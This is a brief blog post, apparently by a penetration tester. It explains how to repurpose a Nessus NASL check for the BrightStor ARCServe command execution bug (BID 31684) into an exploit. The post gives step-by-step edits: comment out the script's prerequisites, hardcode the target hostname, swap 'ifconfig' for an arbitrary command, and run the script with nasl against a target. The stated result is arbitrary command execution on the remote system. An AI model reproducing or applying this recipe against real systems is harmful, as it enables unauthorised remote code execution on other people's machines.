Everyone loves to beat up on Microsoft. Hell, I do… sorry Carric. But Microsoft is slowly getting its software in order, and organizations are learning to patch it very quickly. Personally, I love doing exploit development on small custom software. But in a recent case, I saw a larger software package with a known bug but no exploit.
In particular, I’m talking about the command execution vuln released in October for BrightStor ARCServe, BID 31684.
To actually exploit the bug, use Nessus/NASL.
Find the file arcserve_command_exec.nasl.
Copy it somewhere and edit it. Change the following:
- Ditch the requirements. Comment out:
    #script_require_keys("Host/OS/smb")
    #script_require_ports(6504);
- Manually set the hostname. Change
    host = kb_smb_name();
  to
    host = "hostname";
  Note that an IP won’t work.
- Change the cmd:
    cmd = "ifconfig";
  to whatever you want.
- Change the output to use the display() function so you can see what happens.
- Run the NASL:
    nasl -t target_ip_or_hostname yournasl.nasl
Yes, this is a bit clunky, but it’s a fairly quick way to execute arbitrary commands on the remote system. RPC (IMO) is difficult, and I’d rather not deal with it if someone else already has.